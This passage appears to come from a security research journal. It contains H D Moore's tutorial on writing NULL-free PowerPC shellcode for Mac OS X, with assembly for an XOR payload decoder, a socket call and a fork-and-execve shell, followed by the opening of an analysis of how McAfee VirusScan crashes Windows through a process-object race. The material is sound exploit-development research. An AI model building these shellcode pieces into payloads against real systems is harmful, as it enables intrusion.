http://www.honeynet.org/papers/bots/
Weaver, Nicholas C. Warhol Worms: The Potential for Very
Fast Internet Plagues.
http://www.cs.berkeley.edu/~nweaver/warhol.html
Paxson, Vern, Stuart Staniford, and Nicholas Weaver. How to
0wn the Internet in Your Spare Time.
http://www.icir.org/vern/papers/cdc-usenix-sec02/
Zalewski, Michal. Writing Internet Worms for Fun and
Profit.
http://www.securitymap.net/sdm/docs/virus/worm.txt

Mac OS X PPC Shellcode Tricks
H D Moore
hdm[at]metasploit.com
Last modified: 05/09/2005
0) Foreword
Abstract:
Developing shellcode for Mac OS X is not particularly difficult, but there are
a number of tips and techniques that can make the process easier and more
effective. The independent data and instruction caches of the PowerPC processor
can cause a variety of problems with exploit and shellcode development. The
common practice of patching opcodes at run-time is much more involved when the
instruction cache is in incoherent mode. NULL-free shellcode can be improved by
taking advantage of index registers and the reserved bits found in many
opcodes, saving space otherwise taken by standard NULL evasion techniques. The
Mac OS X operating system introduces a few challenges to unsuspecting
developers; system calls change their return address based on whether they
succeed and oddities in the Darwin kernel can prevent standard execve()
shellcode from working properly with a threaded process. The virtual memory
layout on Mac OS X can be abused to overcome instruction cache obstacles and
develop even smaller shellcode.
Thanks:
The author would like to thank B-r00t, Dino Dai Zovi, LSD, Palante, Optyx, and
the entire Uninformed Journal staff.
1) Introduction
With the introduction of Mac OS X, Apple has been viewed with mixed feelings by
the security community. On one hand, the BSD core offers the familiar Unix
security model that security veterans already understand. On the other, the
amount of proprietary extensions, network-enabled software, and growing mass of
advisories is giving some a cause for concern. Exploiting buffer overflows,
format strings, and other memory-corruption vulnerabilities on Mac OS X is a
bit different from what most exploit developers are familiar with. The
incoherent instruction cache, combined with the RISC fixed-length instruction
set, raises the bar for exploit and payload developers.
On September 12th of 2003, B-r00t published a paper titled "Smashing the Mac
for Fun and Profit". B-root's paper covered the basics of Mac OS X shellcode
development and built on the PowerPC work by LSD, Palante, and Ghandi. This
paper is an attempt to extend, rather than replace, the material already
available on writing shellcode for the Mac OS X operating system. The first
section covers the fundamentals of the PowerPC architecture and what you need
to know to start writing shellcode. The second section focuses on avoiding NULL
bytes and other characters through careful use of the PowerPC instruction set.
The third section investigates some of the unique behavior of the Mac OS X
platform and introduces some useful techniques.
2) PowerPC Basics
The PowerPC (PPC) architecture uses a reduced instruction set consisting of
32-bit fixed-width opcodes. Each opcode is exactly four bytes long and can only
be executed by the processor if the opcode is word-aligned in memory.
2.1) Registers
PowerPC processors have thirty-two 32-bit general-purpose registers (r0-r31;
64-bit PowerPC processors have 64-bit general-purpose registers, but still use
32-bit opcodes), thirty-two 64-bit floating-point registers (f0-f31), a link
register (lr), a count register (ctr), and a handful of other registers for
tracking things like branch conditions, integer overflows, and various machine
state flags. Some PowerPC processors also contain a vector-processing unit
(AltiVec, etc), which can add another thirty-two 128-bit registers to the set.
On the Darwin/Mac OS X platform, r0 is used to store the system call number, r1
is used as a stack pointer, and r3 to r7 are used to pass arguments to a system
call. General-purpose registers between r3 and r12 are considered volatile and
should be preserved before the execution of any system call or library
function.
;;
;; Demonstrate execution of the reboot system call
;;
main:
li r0, 55 ; #define SYS_reboot 55
sc
2.2) Branches
Unlike the IA32 platform, PowerPC does not have a call or jmp instruction.
Execution flow is controlled by one of the many branch instructions. A branch
can redirect execution to a relative address, absolute address, or the value
stored in either the link or count registers. Conditional branches are
performed based on one of four bit fields in the condition register. The count
register can also be used as a condition for branching and some instructions
will automatically decrement the count register. A branch instruction can
automatically set the link register to be the address following the branch,
which is a very simple way to get the absolute address of any relative location
in memory.
;;
;; Demonstrate GetPC() through a branch and link instruction
;;
main:
xor. r5, r5, r5 ; xor r5 with r5, storing the value in r5
; the condition register is updated by the . modifier
ppcGetPC:
bnel ppcGetPC ; branch if condition is not-equal, which will be false
; the address of ppcGetPC+4 is now in the link register
mflr r5 ; move the link register to r5, which points back here
2.3) Memory
Memory access on PowerPC is performed through the load and store instructions.
Immediate values can be loaded to a register or stored to a location in memory,
but the immediate value is limited to 16 bits. When using a load instruction on
a non-immediate value, a base register is used, followed by an offset from that
register to the desired location. Store instructions work in a similar fashion;
the value to be stored is placed into a register, and the store instruction
then writes that value to the destination register plus an offset value.
Multi-word memory instructions exist, but are considered bad practice to use,
since they may not be supported in future PowerPC processors.
Since each PowerPC instruction is 32 bits wide, it is not possible to load a
32-bit address into a register with a single instruction. The standard method
of loading a full 32-bit value requires a load-immediate-shift (lis) followed
by an or-immediate (ori). The first instruction loads the high 16 bits, while
the second loads the lower 16 bits Some people prefer to use
add-immediate-shift against the r0 general purpose register. The r0 register
has a special property in that anytime it is used for addition or substraction,
it is treated as a zero, regardless of the current value 64-bit PowerPC
processors require five separate instructions to load a 32-bit immediate value
into a general-purpose register. This 16-bit limitation also applies to
relative branches and every other instruction that uses an immediate value.
;;
;; Load a 32-bit immediate value and store it to the stack
;;
main:
lis r5, 0x1122 ; load the high bits of the value
; r5 contains 0x11220000
ori r5, r5, 0x3344 ; load the low bits of the value
; r5 now contains 0x11223344
stw r5, 20(r1) ; store this value to SP+20
lwz r3, 20(r1) ; load this value back to r3
2.4) L1 Cache
The PowerPC processor uses one or more on-chip memory caches to accelerate
access to frequently referenced data and instructions. This cache memory is
separated into a distinct data and instruction cache. Although the data cache
operates in coherent mode on Mac OS X, shellcode developers need to be aware of
how the data cache and the instruction cache interoperate when executing
self-modifying code.
As a superscalar architecture, the PowerPC processor contains multiple
execution units, each of which has a pipeline. The pipeline can be described as
a conveyor belt in a factory; as an instruction moves down the belt, specific
steps are performed. To increase the efficiency of the pipeline, multiple
instructions can be put on the belt at the same time, one behind another. The
processor will attempt to predict which direction a branch instruction will
take and then feed the pipeline with instructions from the predicted path. If
the prediction was wrong, the contents of the pipeline are trashed and correct
instructions are loaded into the pipeline instead.
This pipelined execution means that more than one instruction can be processed
at the same time in each execution unit. If one instruction requires the output
of another, a gap can occur in the pipeline while these dependencies are
satisfied. In the case of a store instruction, the contents of the data cache
will be updated before the results are flushed back to main memory. If a load
instruction is executed directly after the store, it will obtain the
newly-updated value. This occurs because the load instruction will read the
value from the data cache, where it has already been updated.
The instruction cache is a different beast altogether. On the PowerPC platform,
the instruction cache is incoherent. If an executable region of memory is
modified and that region is already loaded into the instruction cache, the
modified instructions will not be executed unless the cache is specifically
flushed. The instruction cache is filled from main memory, not the data cache.
If you attempt to modify executable code through a store instruction, flush the
cache, and then attempt to execute that code, there is still a chance that the
original, unmodified code will be executed instead. This can occur because the
data cache was not flushed back to main memory before the instruction cache was
filled.
The solution is a bit tricky: you must use the "dcbf" instruction to invalidate
each block of memory from the data cache, wait for the invalidation to complete
with the "sync" instruction, and then flush the instruction cache for that
block with "icbi". Finally, the "isync" instruction needs to be executed before
the modified code is actually used. Placing these instructions in any other
order may result in stale data being left in the instruction cache. Due to
these restrictions, self-modifying shellcode on the PowerPC platform is rare
and often unreliable.
The example below is a working PowerPC shellcode decoder included with the
Metasploit Framework (OSXPPCLongXOR).
;;
;; Demonstrate a cache-safe payload decoder
;; Based on Dino Dai Zovi's PPC decoder (20030821)
;;
main:
xor. r5, r5, r5 ; Ensure that the cr0 flag is always 'equal'
bnel main ; Branch if cr0 is not-equal and link to LMain
mflr r31 ; Move the address of LMain into r31
addi r31, r31, 68+1974 ; 68 = distance from branch -> payload
; 1974 is null eliding constant
subi r5, r5, 1974 ; We need this for the dcbf and icbi
lis r6, 0x9999 ; XOR key = hi16(0x99999999)
ori r6, r6, 0x9999 ; XOR key = lo16(0x99999999)
addi r4, r5, 1974 + 4 ; Move the number of words to code into r4
mtctr r4 ; Set the count register to the word count
xorlp:
lwz r4, -1974(r31) ; Load the encoded word into memory
xor r4, r4, r6 ; XOR this word against our key in r6
stw r4, -1974(r31) ; Store the modified work back to memory
dcbf r5, r31 ; Flush the modified word to main memory
.long 0x7cff04ac ; Wait for the data block flush (sync)
icbi r5, r31 ; Invalidate prefetched block from i-cache
subi r30, r5, -1978 ; Move to next word without using a NULL
add. r31, r31, r30
bdnz- xorlp ; Branch if --count != 0
.long 0x4cff012c ; Wait for i-cache to synchronize (isync)
; Insert XORed payload here
.long (0x7fe00008 ^ 0x99999999)
3) Avoiding NULLs
One of the most common problems encountered with shellcode development in
general and RISC processors in particular is avoiding NULL bytes in the
assembled code. On the IA32 platform, NULL bytes are fairly easy to dodge,
mostly due to the variable-length instruction set and multiple opcodes
available for a given task. Fixed-width opcode architectures, like PowerPC,
have fixed field sizes and often pad those fields with all zero bits.
Instructions that have a set of undefined bits often set these bits to zero as
well. The result is that many of the available opcodes are impossible to use
with NULL-free shellcode without modification.
On many platforms, self-modifying code can be used to work around NULL byte
restrictions. This technique is not useful for single-instruction patching on
PowerPC, since the instruction pre-fetch and instruction cache can result in
the non-modified instruction being executed instead.
3.1) Undefined Bits
To write interesting shellcode for Mac OS X, you need to use system calls. One
of the first problems encountered with the PowerPC platform is that the system
call instruction assembles to 0x44000002, which contains two NULL bytes. If we
take a look at the IBM PowerPC reference for the 'sc' instruction, we see that
the bit layout is as follows:
010001 00000 00000 0000 0000000 000 1 0
------ ----- ----- ---- ------- --- - -
A B C D E F G H
These 32 bits are broken down into eight specific fields. The first field (A),
which is six bits wide, must be set to the value 17. The bits that make up B, C,
and D are all marked as undefined. Field E must be set to either 1 or 0.
Fields F and H are undefined, and G must always be set to 1. We can modify the
undefined bits to anything we like, in order to make the corresponding byte
values NULL-free. The first step is to reorder these bits along byte boundaries
and mark what we are able to change.
? = undefined
# = zero or one
[010001??] [????????] [????0000] [00#???1?]
The first byte of this instruction can be either 68, 69, 70, or 71 (DEFG). The
second byte can be any character at all. The third byte can either be 0, 16,
32, 48, 64, 80, 96, 112, 128, 144, 160, 176, 192, 208, 224, or 240 (which
contains '0', 'P', and 'p', among others). The fourth value can be any of the
following values: 2, 3, 6, 7, 10, 11, 14, 15, 18, 19, 22, 23, 26, 27, 30, 31,
34, 35, 38, 39, 42, 43, 46, 47, 50, 51, 54, 55, 58, 59, 62, 63. As you can see,
it is possible to create thousands of different opcodes that are all treated by
the processor as a system call. The same technique can be applied to almost any
other instruction that has undefined bits. Although the current line of PowerPC
chips used with Mac OS X seems to ignore the undefined bits, future processors
may actually use these bits. It is entirely possible that undefined bit abuse
can prevent your code from working on newer processors.
;;
;; Patching the undefined bits in the 'sc' opcode
;;
main:
li r0, 1 ; sys_exit
li r3, 0 ; exit status
.long 0x45585037 ; sc patched as "EXP7"
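The bit patterns above are easy to verify mechanically. The following
Python sketch (not part of the original toolchain) checks a 32-bit word
against the defined bits of the 'sc' layout shown above, and tests it for
NULL bytes:

```python
def is_sc_variant(word):
    # Check only the defined bits of the 'sc' encoding: primary
    # opcode 17 (field A), the fixed zero bits in bytes 3 and 4,
    # and the mandatory 1 bit (field G). Undefined bits are ignored.
    return ((word >> 26) == 0b010001 and   # field A == 17
            ((word >> 8) & 0x0F) == 0 and  # fixed zeros in byte 3
            (word & 0xC0) == 0 and         # fixed zeros in byte 4
            (word & 0x02) == 0x02)         # field G == 1

def null_free(word):
    # True if none of the four big-endian bytes is 0x00.
    return all((word >> shift) & 0xFF for shift in (24, 16, 8, 0))
```

Enumerating all words that pass is_sc_variant() and null_free() reproduces
the thousands of NULL-free system call encodings the text describes.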
3.2) Index Registers
On the PowerPC platform, immediate values are encoded using all 16 bits. If the
assembled value of your immediate contains a NULL, you will need to find another
way to load it into the target register. The most common technique is to first
load a NULL-free value into a register, then subtract from it the
difference between that value and your target immediate.
;;
;; Demonstrate index register usage
;;
main:
li r7, 1999 ; place a NULL-free value into the index
subi r5, r7, 1999-1 ; subtract the index value minus the target
; the r5 register is now set to 1
If you have a rough idea of the immediate values you will need in your
shellcode, you can take this a step further. Set your initial index register to
a value, that when decremented by the immediate value, actually results in a
character of your choice. If you have two distant ranges (1-10 and 50-60), then
consider using two index registers. The example below demonstrates an index
register that works for the system call number as well as the arguments,
leaving the assembled bytes NULL-free. As you can see, besides the four bytes
required to set the index register, this method does not significantly increase
the size of the code.
;;
;; Create a TCP socket without NULL bytes
;;
main:
li r7, 0x3330 ; 0x38e03330 = NULL-free index value
subi r0, r7, 0x3330-97 ; 0x3807cd31 = system call for sys_socket
subi r3, r7, 0x3330-2 ; 0x3867ccd2 = socket domain
subi r4, r7, 0x3330-1 ; 0x3887ccd1 = socket type
subi r5, r7, 0x3330-6 ; 0x38a7ccd6 = socket protocol
.long 0x45585037 ; patched 'sc' instruction
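Since subi and li are both forms of addi, the encodings shown in the
comments above can be reproduced with a tiny Python sketch of the addi
field layout (an illustration, not a real assembler):

```python
def addi(rd, ra, simm):
    # addi rD,rA,SIMM: primary opcode 14, then the 5-bit rD and rA
    # fields, then the 16-bit signed immediate. 'subi rD,rA,V' is
    # just 'addi rD,rA,-V', and 'li rD,V' is 'addi rD,0,V'.
    return (14 << 26) | (rd << 21) | (ra << 16) | (simm & 0xFFFF)

def null_free(word):
    # True if none of the four big-endian bytes is 0x00.
    return all((word >> shift) & 0xFF for shift in (24, 16, 8, 0))
```

A helper like this makes it quick to search for an index value whose li
and every derived subi all assemble without NULL bytes.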
3.3) Branching
Branching to a forward address without using NULL bytes can be tricky on
PowerPC systems. If you try branching forward, but less than 256 bytes, your
opcode will contain a NULL. If you obtain your current address and want to
branch to an offset from it, you will need to place the target address into the
count register (ctr) or the link register (lr). If you decide to use the link
register, you will notice that every valid form of "blr" has a NULL byte. You
can avoid the NULL byte by setting the branch hint bits (19-20) to "11"
(unpredictable branch, do not optimize). The resulting opcode becomes
0x4e804820 instead of 0x4e800020 for the standard "blr" instruction.
The branch prediction bit (bit 10) can also come in handy; it is useful if you
need to change the second byte of the branch instruction to a different
character. The prediction bit tells the processor how likely it is that the
instruction will result in a branch. To specify the branch prediction bit in
the assembly source, just place '-' or '+' after the branch instruction.
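A quick way to convince yourself that the patched opcode is still a blr is
to decode both words field by field. The Python sketch below (an
illustration, not a full disassembler) splits an XL-form branch into its
defined fields:

```python
def decode_branch_xlform(word):
    # Field split for XL-form branch opcodes such as bclr ('blr' is
    # bclr with BO=20, BI=0): primary opcode, BO, BI, the extended
    # opcode, and the link bit. Hint/reserved bits are not extracted.
    return {
        "opcd": (word >> 26) & 0x3F,
        "bo":   (word >> 21) & 0x1F,
        "bi":   (word >> 16) & 0x1F,
        "xo":   (word >> 1) & 0x3FF,
        "lk":   word & 0x1,
    }

def null_free(word):
    # True if none of the four big-endian bytes is 0x00.
    return all((word >> shift) & 0xFF for shift in (24, 16, 8, 0))
```

Both 0x4e800020 and 0x4e804820 decode to the same defined fields; only the
patched form is free of NULL bytes.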
4) Mac OS X Tricks
This section describes a handful of tips and tricks for writing shellcode on
the Mac OS X platform.
4.1) Diagnostic Tools
Mac OS X includes a solid collection of development and diagnostic tools, many
of which are invaluable for shellcode and exploit development. The list below
describes some of the most commonly used tools and how they relate to shellcode
development.
Xcode: This package includes 'gdb', 'gcc', and 'as'. Sadly, objdump is not
included and most disassembly needs to be done with 'gdb' or 'otool'.
ktrace: The ktrace and kdump tools are equivalent to strace on Linux and truss
on Solaris. There is no better tool for quickly diagnosing shellcode
bugs.
vmmap: If you were looking for the equivalent of /proc/pid/maps, you found it.
Use vmmap to figure out where the heap, library, and stacks are mapped.
crashreporterd: This daemon runs by default and creates very nice crash dumps
when a system service dies. Invaluable for finding 0-day in Mac OS X
services. The crashdump logs can be found in /Library/Logs/CrashReporter.
heap: Quickly list all heaps in a process. This can be handy when the
instruction cache prevents a direct return and you need to find an
alternate shellcode location.
otool: List all libraries linked to a given binary, disassemble mach-o
binaries, and display the contents of any section of an executable or
library. This is the equivalent of 'ldd' and 'objdump' rolled into a
single utility.
4.2) System Call Failure
An interesting feature of Mac OS X is that a successful system call will return
to the address 4 bytes after the end of the 'sc' instruction and a failed system
call will return directly after the 'sc' instruction. This allows you to
execute a specific instruction only when the system call fails. The most common
application of this feature is to branch to an error handler, although it can
also be used to set a flag or a return value. When writing shellcode, this
feature is usually more annoying than anything else, since it boosts the size
of your code by four bytes per system call. In some cases though, this feature
can be used to shave an instruction or two off the final payload.
4.3) Threads and Execve
Mac OS X has an undocumented behavior concerning the execve() system call
inside a threaded process. If a process tries to call execve() and has more
than one active thread, the kernel returns the error EOPNOTSUPP. After a closer
look at kern_exec.c in the Darwin XNU source code, it becomes apparent that for
shellcode to function properly inside a threaded process, it will need to call
either fork() or vfork() before calling execve().
;;
;; Fork and execute a command shell
;;
main:
_fork:
li r0, 2
sc
b _exitproc
_execsh: ; based on ghandi's execve
xor. r5, r5, r5
bnel _execsh
mflr r3
addi r3, r3, 32 ; 32
stw r3, -8(r1) ; argv[0] = path
stw r5, -4(r1) ; argv[1] = NULL
subi r4, r1, 8 ; r4 = {path, 0}
li r0, 59
sc ; execve(path, argv, NULL)
b _exitproc
_path:
.ascii "/bin/csh" ; csh handles seteuid() for us
.long 0
_exitproc:
li r0, 1
li r3, 0
sc
4.4) Shared Libraries
The Mac OS X user community tends to have one thing in common -- they keep
their systems up to date. The Apple Software Update service, once enabled, is
very insistent about installing new software releases as they become available.
The result is that nearly every single Mac OS X system has the exact same
binaries. System libraries are often loaded at the exact same virtual address
across all applications. In this sense, Mac OS X is starting to resemble the
Windows platform.
If all processes on all Mac OS X systems have the same virtual addresses for the
same libraries, Windows-style shellcode starts to become possible. Assuming you
can find the right argument-setting code in a shared library, return-to-library
payloads also become much more feasible. These libraries can be used as return
addresses, similar to how Windows exploits often return back to a loaded DLL.
Some useful addresses are listed below:
0x90000000: The base address of the system library (libSystem.B.dylib), most
of the function locations are static across all versions of OS X.
0xffff8000: The base address of the "common" page. A number of useful
functions and instructions can be found here. These functions
include memcpy, sys_dcache_flush, sys_icache_invalidate, and bcopy.
The following NULL-free example uses the sys_icache_invalidate function to flush
1040 bytes from the instruction cache, starting at the address of the payload:
;;
;; Flush the instruction cache in 32 bytes
;;
main:
_main:
xor. r5, r5, r5
bnel main
mflr r3
;; flush 1040 bytes starting after the branch
li r4, 1024+16
;; 0xffff8520 is __sys_icache_invalidate()
addis r8, r5, hi16(0xffff8520)
ori r8, r8, lo16(0xffff8520)
mtctr r8
bctrl
5) Conclusion
In the first section, we covered the fundamentals of the PowerPC platform and
described the syscall calling convention used on the Darwin/Mac OS X platform.
The second section introduced a few techniques for removing NULL bytes from
some common instructions. In the third section, we presented some of the tools
and techniques that can be useful for shellcode development.
Bibliography
B-r00t. PowerPC / OSX (Darwin) Shellcode Assembly.
http://packetstormsecurity.org/shellcode/PPC_OSX_Shellcode_Assembly.pdf
Bunda, Potter, and Shadowen. PowerPC Microprocessor Developer's Guide.
http://www.amazon.com/exec/obidos/tg/detail/-/0672305437/
Heath, Steve. Newnes Power PC Programming Pocket Book.
http://www.amazon.com/exec/obidos/tg/detail/-/0750621117/
IBM PowerPC Assembler Language Reference.
http://publib16.boulder.ibm.com/pseries/en_US/aixassem/alangref/mastertoc.htm

What Were They Thinking?
Annoyances Caused by Unsafe Assumptions
skape
mmiller@hick.org
Last modified: 04/04/2005
1) Introduction
There is perhaps no issue more dear to a developer's heart than the
issue of interoperability with third-party applications. In some
cases, software that is being written by one developer has to be
altered in order to make it function properly when used in
conjunction with another application that is created by a
third-party. For the sake of illustration, the lone developer will
henceforth be referred to as the protagonist given his or her
valiant efforts in their quest to obtain that which is almost always
unattainable: interoperability. The third-parties, on the other
hand, will be referred to as the antagonists due to their wretched
attempts to prevent the protagonist from obtaining his or her goal
of a utopian software environment. Now, granted, that's not to say
that the protagonist can't also become the antagonist by continuing
the ugly cycle of exposing compatibility issues to other would-be
protagonists, but for the sake of discussion such a point is not
relevant.
What is relevant, however, are the ways in which an antagonistic
developer can write software that will force other developers to
work around issues exposed by the software that the antagonist has
written. There are far too many specific issues to list, but the
majority of these issues can be generalized into one category that
will serve as the focus for this document. To put it simply, many
developers make assumptions about the state of the machine that
their software will be executing on. For instance, some software
will assume that they are the only piece of software performing a
given task on a machine. In the event that another piece of software
attempts to perform a similar task, such as may occur when two
applications need to extend APIs by hooking them, the results may be
unpredictable. Perhaps a more concrete example of where assumptions
can lead to problems can be seen when developers assume that the
behavior of undocumented or unexposed APIs will not change.
Before putting all of the blame on the antagonists, however, it is
important to understand that it is, in most cases, necessary to make
assumptions about the way in which undocumented code performs, such
as when dealing with low-level software. This is especially true
when dealing with closed-source APIs, such as those provided by
Microsoft. To that point, Microsoft has made an effort to document
the ways in which every exposed API routine can perform, thereby
reducing the number of compatibility issues that a developer might
experience if they were to assume that a given routine would always
perform in the same manner. Furthermore, Microsoft is renowned for
attempting to always provide backwards compatibility. If a
Microsoft application performs one way in a given release, chances
are that it will continue to perform in the same fashion in
subsequent releases. Third-party vendors, on the other hand, tend to
have a more egocentric view of the way in which their software
should work. This leads most vendors to dodge responsibility by
pointing the blame at the application that is attempting to perform
a certain task rather than making their own code more robust.
In the interest of helping to make code more robust, this document
will provide two examples of widely used software that make
assumptions about the way in which code will execute on a given
machine. The assumptions these applications make are safe
under normal conditions. However, if a new application that
performs a certain task or an undocumented change is thrown into the
mix, the applications find themselves faltering in the most
unenjoyable ways. The two applications that will be analyzed are
listed below:
- McAfee VirusScan Consumer (8.0/9.0)
- ATI Radeon 9000 Driver Series
Each of the assumptions that these two software products make will
be analyzed in-depth to describe why it is that they are poor
assumptions to make, such as by describing or illustrating
conditions where the assumptions are, or could be, false. From
there, suggestions will be made on how these assumptions might be
worked around or fixed to allow for a more stable product in
general. In the end, the reader should have a clear understanding of
the assumptions described in this document. If successful, the
author hopes the topic will allow the reader to think critically
about the various assumptions the reader might make when
implementing software.
2) McAfee VirusScan Consumer (8.0/9.0)
2.1) The Assumption
McAfee VirusScan Consumer 8.0, 9.0, and possibly previous versions
make assumptions about processes not performing certain types of
file operations during a critical phase of process initialization.
If file operations are performed during this phase, the machine may
blue screen due to an invalid pointer access.
2.2) The Problem
The critical phase of process execution that the summary refers to is the
period between the time that the new process object instance is created by
nt!ObCreateObject and the time the new process object is inserted into the
process object type list by nt!ObInsertObject. The reason this phase is so
critical is because it is not safe for things to attempt to obtain a handle to
the process object, such as can be done by calling nt!ObOpenObjectByPointer.
If an application were to attempt to obtain a handle to the process object
before it had been inserted into the process object list by nt!ObInsertObject,
critical creation state information that is stored in the process object's
header would be overwritten with state information that is meant to be used
after the process has passed the initial security validation phase that is
handled by nt!ObInsertObject. In some cases, overwriting the creation state
information prior to calling nt!ObInsertObject can lead to invalid pointer
references when nt!ObInsertObject is eventually called, thus leading to an evil
blue screen that some users are all too familiar with.
To better understand this problem it is first necessary to understand the way
in which nt!PspCreateProcess creates and initializes the process object and the
process handle that is passed back to callers. The object creation portion is
accomplished by making a call to nt!ObCreateObject in the following fashion:
ObCreateObject(
    KeGetPreviousMode(),   // ProbeMode
    PsProcessType,         // ObjectType
    ObjectAttributes,      // ObjectAttributes
    KeGetPreviousMode(),   // OwnershipMode
    0,                     // ParseContext
    0x258,                 // ObjectBodySize (sizeof(EPROCESS) on this build)
    0,                     // PagedPoolCharge
    0,                     // NonPagedPoolCharge
    &ProcessObject);       // receives the new process object
If the call is successful, a process object of the supplied size is created and
initialized using the attributes supplied by the caller. In this case, the
object is created using the nt!PsProcessType object type. The size argument
that is supplied to nt!ObCreateObject, which in this case is 0x258, will vary
between various versions of Windows as new fields are added and removed from
the opaque EPROCESS structure. The process object's instance, as with all
objects, is prefixed with an OBJECT_HEADER that may or may not also be prefixed
with optional object information. For reference, the OBJECT_HEADER structure is
defined as follows:
OBJECT_HEADER:
+0x000 PointerCount : Int4B
+0x004 HandleCount : Int4B
+0x004 NextToFree : Ptr32 Void
+0x008 Type : Ptr32 _OBJECT_TYPE
+0x00c NameInfoOffset : UChar
+0x00d HandleInfoOffset : UChar
+0x00e QuotaInfoOffset : UChar
+0x00f Flags : UChar
+0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
+0x010 QuotaBlockCharged : Ptr32 Void
+0x014 SecurityDescriptor : Ptr32 Void
+0x018 Body : _QUAD
When an object is first returned from nt!ObCreateObject, the Flags attribute
will indicate if the ObjectCreateInfo attribute is pointing to valid data by
having the OB_FLAG_CREATE_INFO, or 0x1 bit, set. If the flag is set then the
ObjectCreateInfo attribute will point to an OBJECT_CREATE_INFORMATION structure
which has the following definition:
OBJECT_CREATE_INFORMATION:
+0x000 Attributes : Uint4B
+0x004 RootDirectory : Ptr32 Void
+0x008 ParseContext : Ptr32 Void
+0x00c ProbeMode : Char
+0x010 PagedPoolCharge : Uint4B
+0x014 NonPagedPoolCharge : Uint4B
+0x018 SecurityDescriptorCharge : Uint4B
+0x01c SecurityDescriptor : Ptr32 Void
+0x020 SecurityQos : Ptr32 _SECURITY_QUALITY_OF_SERVICE
+0x024 SecurityQualityOfService : _SECURITY_QUALITY_OF_SERVICE
When nt!ObInsertObject is finally called, it is assumed that the object still
has the OB_FLAG_CREATE_INFO bit set. This will always be the case unless something
has caused the bit to be cleared, as will be illustrated later in this chapter.
The flow of execution within nt!ObInsertObject begins first by checking to see
if the process' object header has any name information, which is conveyed by
the NameInfoOffset of the OBJECT_HEADER. Regardless of whether or not the
object has name information, the next step taken is to check to see if the
object type that is associated with the object that is supplied to
nt!ObInsertObject requires a security check to be performed. This requirement
is conveyed through the TypeInfo attribute of the OBJECT_TYPE structure which is
defined below:
OBJECT_TYPE:
+0x000 Mutex : _ERESOURCE
+0x038 TypeList : _LIST_ENTRY
+0x040 Name : _UNICODE_STRING
+0x048 DefaultObject : Ptr32 Void
+0x04c Index : Uint4B
+0x050 TotalNumberOfObjects : Uint4B
+0x054 TotalNumberOfHandles : Uint4B
+0x058 HighWaterNumberOfObjects : Uint4B
+0x05c HighWaterNumberOfHandles : Uint4B
+0x060 TypeInfo : _OBJECT_TYPE_INITIALIZER
+0x0ac Key : Uint4B
+0x0b0 ObjectLocks : [4] _ERESOURCE
OBJECT_TYPE_INITIALIZER:
+0x000 Length : Uint2B
+0x002 UseDefaultObject : UChar
+0x003 CaseInsensitive : UChar
+0x004 InvalidAttributes : Uint4B
+0x008 GenericMapping : _GENERIC_MAPPING
+0x018 ValidAccessMask : Uint4B
+0x01c SecurityRequired : UChar
+0x01d MaintainHandleCount : UChar
+0x01e MaintainTypeList : UChar
+0x020 PoolType : _POOL_TYPE
+0x024 DefaultPagedPoolCharge : Uint4B
+0x028 DefaultNonPagedPoolCharge : Uint4B
+0x02c DumpProcedure : Ptr32
+0x030 OpenProcedure : Ptr32
+0x034 CloseProcedure : Ptr32
+0x038 DeleteProcedure : Ptr32
+0x03c ParseProcedure : Ptr32
+0x040 SecurityProcedure : Ptr32
+0x044 QueryNameProcedure : Ptr32
+0x048 OkayToCloseProcedure : Ptr32
The specific boolean field that is checked by nt!ObInsertObject is the
TypeInfo.SecurityRequired flag. If the flag is set to TRUE, which it is for
the nt!PsProcessType object type, then nt!ObInsertObject uses the access state
that is passed in as the second argument or creates a temporary access state
that it uses to validate the access mask that is supplied as the third argument
to nt!ObInsertObject. Prior to validating the access state, however, the
SecurityDescriptor attribute of the ACCESS_STATE structure is set to the
SecurityDescriptor of the OBJECT_CREATE_INFORMATION structure. This is done
without any checks to ensure that the OB_FLAG_CREATE_INFO flag is still set in the
object's header, thus making it potentially dangerous if the flag has been
cleared and the union'd attribute no longer points to creation information.
In order to validate the access mask, nt!ObInsertObject calls into
nt!ObpValidateAccessMask with the initialized ACCESS_STATE as the only argument.
This function first checks to see if the ACCESS_STATE's SecurityDescriptor
attribute is set to NULL. If it's not, then the function checks to see if the
SecurityDescriptor's Control attribute has a flag set. It is at this point
that the problem is realized under conditions where the object's
ObjectCreateInfo attribute no longer points to creation information. When such
a condition occurs, the SecurityDescriptor attribute that is referenced
relative to the ObjectCreateInfo attribute will potentially point to invalid
memory. This can then lead to an access violation when attempting to reference
the SecurityDescriptor that is passed as part of the ACCESS_STATE instance to
nt!ObpValidateAccessMask. For reference, the ACCESS_STATE structure is defined
below:
ACCESS_STATE:
+0x000 OperationID : _LUID
+0x008 SecurityEvaluated : UChar
+0x009 GenerateAudit : UChar
+0x00a GenerateOnClose : UChar
+0x00b PrivilegesAllocated : UChar
+0x00c Flags : Uint4B
+0x010 RemainingDesiredAccess : Uint4B
+0x014 PreviouslyGrantedAccess : Uint4B
+0x018 OriginalDesiredAccess : Uint4B
+0x01c SubjectSecurityContext : _SECURITY_SUBJECT_CONTEXT
+0x02c SecurityDescriptor : Ptr32 Void
+0x030 AuxData : Ptr32 Void
+0x034 Privileges : __unnamed
+0x060 AuditPrivileges : UChar
+0x064 ObjectName : _UNICODE_STRING
+0x06c ObjectTypeName : _UNICODE_STRING
Under normal conditions, nt!ObInsertObject is the first routine to create a
handle to the newly created object instance. When the handle is created, the
creation information that was initialized during the instantiation of the
object is used for such things as validating access, as described above. Once
the creation information is used it is discarded and replaced with other
information that is specific to the type of the object being inserted. In the
case of process objects, the Flags attribute has the OB_FLAG_CREATE_INFO bit
cleared and the QuotaBlockCharged attribute, which is union'd with the
ObjectCreateInfo attribute, is set to an instance of an EPROCESS_QUOTA_BLOCK
which is defined below:
EPROCESS_QUOTA_ENTRY:
+0x000 Usage : Uint4B
+0x004 Limit : Uint4B
+0x008 Peak : Uint4B
+0x00c Return : Uint4B
EPROCESS_QUOTA_BLOCK:
+0x000 QuotaEntry : [3] _EPROCESS_QUOTA_ENTRY
+0x030 QuotaList : _LIST_ENTRY
+0x038 ReferenceCount : Uint4B
+0x03c ProcessCount : Uint4B
The assumptions made by nt!ObInsertObject work flawlessly so long as it is the
first routine to create a handle to the object instance. Fortunately, under
normal circumstances, nt!ObInsertObject is always the first routine to create a
handle to the object. Unfortunately for McAfee, however, they assume that they
can safely attempt to obtain a handle to a process object without first
checking to see what state of execution the process is in, such as by checking
to see if the OB_FLAG_CREATE_INFO flag is set in the object's header. By
